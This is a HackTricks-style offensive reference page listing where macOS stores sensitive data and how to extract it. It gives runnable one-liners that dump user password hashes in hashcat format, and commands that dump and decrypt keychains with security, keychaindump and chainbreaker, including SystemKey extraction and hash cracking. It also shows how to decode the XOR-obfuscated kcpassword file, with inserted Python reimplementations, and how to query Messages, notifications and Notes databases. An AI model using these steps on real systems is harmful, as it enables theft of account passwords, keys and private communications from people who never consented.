hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
2024-02-11 02:13:58 +00:00


# macOS Sensitive Locations

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

## Passwords

### Shadow Passwords

The shadow password is stored together with the user's configuration in plists located in /var/db/dslocal/nodes/Default/users/.
The following one-liner can be used to dump all the information about the users (including the hash info):

{% code overflow="wrap" %}
```bash
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
```
{% endcode %}

Scripts like this one or this one can be used to convert the hash into hashcat format.

An alternative one-liner that dumps the credentials of all non-service accounts in hashcat format -m 7100 (macOS PBKDF2-SHA512):

{% code overflow="wrap" %}
```bash
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
```
{% endcode %}
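The one-liner above chains plutil, base64 and awk to walk the nested structure. As an added example (not code from the page or from any HackTricks script), the same parsing in Python with plistlib makes the layout explicit: the user record plist carries a `ShadowHashData` array whose single entry is itself a binary plist holding the `SALTED-SHA512-PBKDF2` dict with `iterations`, `salt` and `entropy`. It also reports whether the stored PBKDF2 work factor is below a baseline, which is the check an auditor wants when reviewing local accounts. The sample record, the user name `alice` and the `MIN_ITERATIONS` threshold are constructed for this example.

```python
import plistlib

# Key names used inside the nested ShadowHashData plist (the same names the
# plutil one-liner extracts): SALTED-SHA512-PBKDF2 -> {iterations, salt, entropy}
HASH_TYPE = "SALTED-SHA512-PBKDF2"

# Baseline for flagging a weak PBKDF2 work factor. Assumed value for this
# example; pick one that matches your own hardening standard.
MIN_ITERATIONS = 20000


def parse_shadow_hash(user_plist: bytes) -> dict:
    """Parse a dslocal user record plist and return its PBKDF2 parameters.

    Returns a dict with name, iterations, salt (bytes) and entropy (bytes).
    Raises KeyError when the record has no SALTED-SHA512-PBKDF2 hash
    (for instance a service account without a password).
    """
    record = plistlib.loads(user_plist)
    name = record["name"][0]
    # ShadowHashData is an array holding one binary plist blob.
    inner = plistlib.loads(record["ShadowHashData"][0])
    params = inner[HASH_TYPE]
    return {
        "name": name,
        "iterations": int(params["iterations"]),
        "salt": bytes(params["salt"]),
        "entropy": bytes(params["entropy"]),
    }


def to_hashcat_7100(info: dict) -> str:
    """Format as hashcat -m 7100: name:$ml$<iterations>$<salt hex>$<entropy hex>."""
    return "{}:$ml${}${}${}".format(
        info["name"], info["iterations"], info["salt"].hex(), info["entropy"].hex()
    )


def weak_iterations(info: dict, minimum: int = MIN_ITERATIONS) -> bool:
    """True when the stored PBKDF2 iteration count is below the chosen baseline."""
    return info["iterations"] < minimum


def build_sample_record(name: str, iterations: int, salt: bytes, entropy: bytes) -> bytes:
    """Build a constructed user record with the same nesting macOS uses.

    Test fixture only; this is not a real /var/db/dslocal record.
    """
    inner = plistlib.dumps(
        {HASH_TYPE: {"iterations": iterations, "salt": salt, "entropy": entropy}},
        fmt=plistlib.FMT_BINARY,
    )
    return plistlib.dumps(
        {"name": [name], "ShadowHashData": [inner]}, fmt=plistlib.FMT_BINARY
    )


if __name__ == "__main__":
    sample = build_sample_record("alice", 35460, bytes(range(32)), bytes(128))
    info = parse_shadow_hash(sample)
    print(to_hashcat_7100(info))
    print("weak work factor" if weak_iterations(info) else "work factor ok")
```

To use it on a real system, read each file under /var/db/dslocal/nodes/Default/users/ as root and pass its bytes to `parse_shadow_hash`; records without a `SALTED-SHA512-PBKDF2` entry raise KeyError and can be skipped.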

### Keychain Dump

Note that when using the security binary to dump the decrypted passwords, several prompts will ask the user to allow the operation.

```bash
#security
security dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, including secrets (the user will be asked for their password, even if root)
```

#### Keychaindump

{% hint style="danger" %} According to this comment juuso/keychaindump#10 (comment), it seems these tools no longer work on Big Sur. {% endhint %}

#### Keychaindump Overview

A tool named keychaindump was developed to extract passwords from macOS keychains, but it runs into limitations on newer macOS versions such as Big Sur, as noted in the discussion linked above. Using keychaindump requires the attacker to gain access and escalate privileges to root. The tool exploits the fact that the keychain is unlocked automatically at user login for convenience, which lets applications access it without repeatedly asking for the user's password. If, however, the user chooses to lock their keychain after every use, keychaindump becomes ineffective.

Keychaindump works by targeting a specific process called securityd, described by Apple as the daemon for authorization and cryptographic operations and essential for accessing the keychain. The extraction process involves identifying a Master Key derived from the user's login password; this key is required to read the keychain file. To locate the Master Key, keychaindump scans the memory heap of securityd with the vmmap command, looking for candidate keys inside the regions flagged as MALLOC_TINY. The following command is used to inspect those memory regions:

```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY
```

After identifying potential master keys, keychaindump searches through the heaps for a specific pattern (0x0000000000000018) that marks a master key candidate. Further steps, including deobfuscation, are needed to use this key, as laid out in keychaindump's source code. Analysts working in this area should keep in mind that the data needed to decrypt the keychain lives in the memory of the securityd process. An example command to run keychaindump is:

```bash
sudo ./keychaindump
```

#### chainbreaker

Chainbreaker can be used to extract the following types of information from an OSX keychain in a forensically sound manner:

- Hashed Keychain password, suitable for cracking with hashcat or John the Ripper
- Internet Passwords
- Generic Passwords
- Private Keys
- Public Keys
- X509 Certificates
- Secure Notes
- Appleshare Passwords

Given the keychain unlock password, a master key obtained with volafox or volatility, or an unlock file such as SystemKey, Chainbreaker will also provide the plaintext passwords.

Without one of these ways of unlocking the keychain, Chainbreaker will display all the other available information.

**Dump keychain keys**

```bash
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
```

**Dump keychain keys (with passwords) with SystemKey**

```bash
# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```

**Dump keychain keys (with passwords) cracking the hash**

```bash
# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```

**Dump keychain keys (with passwords) with memory dump**

Follow these steps to perform a memory dump:

```bash
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unfortunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump

#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```

**Dump keychain keys (with passwords) using the user's password**

If you know the user's password, you can use it to dump and decrypt the keychains that belong to that user.

```bash
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
```

### kcpassword

The kcpassword file holds the user's login password, but only if the system owner has enabled auto login. In that case the user is logged in automatically without being asked for a password (which is not very secure).

The password is stored in the file /etc/kcpassword XORed with the key 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F. If the user's password is longer than the key, the key is reused.
This makes the password easy to recover, for example with a script like this one.
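The XOR transform above is the whole protection, so it is worth seeing why the page calls auto login insecure. The following Python is an added example (not the page's script or any Apple code) that applies the 11-byte key cyclically in both directions, so that a round trip shows the stored form is reversible without any secret. The page only states the XOR-with-repeating-key step; the NUL terminator and the padding to a 12-byte multiple in `encode_kcpassword`, and stopping at the first NUL in `decode_kcpassword`, are assumptions made for this example. `autologin_enabled` is the audit check that matters to a defender: the file only exists while auto login is turned on.

```python
import os

# kcpassword obfuscation key as given above (11 bytes, reused cyclically)
KCPASSWORD_KEY = bytes([0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F])


def xor_with_key(data: bytes, key: bytes = KCPASSWORD_KEY) -> bytes:
    """XOR every byte with the key, cycling the key when data is longer than it."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_kcpassword(password: str) -> bytes:
    """Produce a kcpassword-style blob from a password.

    Assumption for this example: the UTF-8 password is NUL-terminated and
    padded with NUL bytes to a multiple of 12 before XORing. Only the XOR
    with the repeating key is stated on the page.
    """
    raw = password.encode("utf-8") + b"\x00"
    raw += b"\x00" * (-len(raw) % 12)
    return xor_with_key(raw)


def decode_kcpassword(blob: bytes) -> str:
    """Undo the XOR and cut at the first NUL (assumed terminator)."""
    plain = xor_with_key(blob)
    end = plain.find(b"\x00")
    if end == -1:
        end = len(plain)
    return plain[:end].decode("utf-8", errors="replace")


def autologin_enabled(path: str = "/etc/kcpassword") -> bool:
    """Audit check: auto login is on whenever the kcpassword file exists.

    Only tests for presence; it never reads the file's contents.
    """
    return os.path.exists(path)


if __name__ == "__main__":
    blob = encode_kcpassword("hunter2")  # constructed sample password
    print(blob.hex())
    print(decode_kcpassword(blob))
    print("auto login enabled" if autologin_enabled() else "auto login off")
```

The remediation is the obvious one: disable automatic login in System Settings (Users & Groups), after which /etc/kcpassword is removed and `autologin_enabled` returns False.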

## Interesting Information in Databases

### Messages

```bash
sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
```

### Notifications

You can find the Notifications data in $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/

Most of the interesting information is stored in a blob, so you need to extract that content and convert it to something human readable, or simply use strings. To do that you can run:

{% code overflow="wrap" %}
```bash
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
```
{% endcode %}

### Notes

The user's notes can be found in ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite

{% code overflow="wrap" %}
```bash
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables

#To dump it in a readable format (each note body is a gzip-compressed blob):
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.z ; done
```
{% endcode %}
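The shell loop above writes every ZDATA blob to a temporary file and runs zcat on it. As an added example (not the page's own code), the same extraction in Python reads the ZICNOTEDATA rows through the sqlite3 module and decompresses each gzip blob in memory, which avoids leaving a body1.gz.z file behind in the working directory and keeps going when a row is NULL or is not gzip at all. The NoteStore-like database it builds (only the Z_PK and ZDATA columns) and the note bodies inside it are constructed for this example; a real NoteStore.sqlite contains many more tables and its decompressed bodies are protobuf, so running strings over the result is still the practical way to read them.

```python
import gzip
import os
import sqlite3
import tempfile


def dump_note_bodies(db_path: str) -> dict:
    """Return {Z_PK: decompressed bytes} for every row of ZICNOTEDATA.

    Mirrors the shell loop above but decompresses in memory. Rows whose
    ZDATA is NULL yield b""; rows that are not valid gzip are returned raw
    so nothing is silently dropped.
    """
    bodies = {}
    conn = sqlite3.connect(db_path)
    try:
        for pk, zdata in conn.execute(
            "SELECT Z_PK, ZDATA FROM ZICNOTEDATA ORDER BY Z_PK"
        ):
            if zdata is None:
                bodies[pk] = b""
                continue
            try:
                bodies[pk] = gzip.decompress(zdata)
            except (OSError, EOFError):  # BadGzipFile is an OSError subclass
                bodies[pk] = bytes(zdata)
    finally:
        conn.close()
    return bodies


def build_sample_notestore(path: str, rows) -> None:
    """Create a constructed NoteStore-like DB with just the columns used here.

    rows: iterable of (Z_PK, ZDATA blob) pairs prepared by the caller.
    """
    conn = sqlite3.connect(path)
    with conn:
        conn.execute(
            "CREATE TABLE ZICNOTEDATA (Z_PK INTEGER PRIMARY KEY, ZDATA BLOB)"
        )
        conn.executemany("INSERT INTO ZICNOTEDATA VALUES (?, ?)", rows)
    conn.close()


def demo_roundtrip() -> dict:
    """Build a throwaway database in a temp dir, dump it and return the bodies."""
    rows = [
        (1, gzip.compress(b"grocery list: milk, eggs")),      # constructed note
        (2, gzip.compress(b"meeting notes (constructed)")),   # constructed note
        (3, b"not gzip at all"),                              # exercises the fallback
        (4, None),                                            # NULL blob
    ]
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "NoteStore.sqlite")
        build_sample_notestore(path, rows)
        return dump_note_bodies(path)


if __name__ == "__main__":
    for pk, body in demo_roundtrip().items():
        print(pk, body[:40])
```

Against a live system, call `dump_note_bodies` with the expanded path of ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite; copying the database first avoids locking conflicts with the running Notes process.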
